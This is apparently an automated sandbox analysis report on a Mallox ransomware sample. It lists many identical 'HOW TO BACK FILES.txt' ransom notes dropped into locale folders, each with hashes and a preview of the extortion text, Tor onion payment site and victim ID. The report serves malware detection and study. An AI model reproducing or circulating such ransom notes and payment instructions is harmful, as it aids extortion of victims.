                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\fr-ML\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\fr-RE\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\fr-SN\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\gl-ES\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ha-Latn-NG\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\he-IL\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\hi-IN\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\hr-BA\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\hr-HR\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\hu-HU\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\hy-AM\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\id-ID\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\it-CH\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\it-IT\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ka-GE\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\kk-KZ\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\lt-LT\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\lv-LV\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
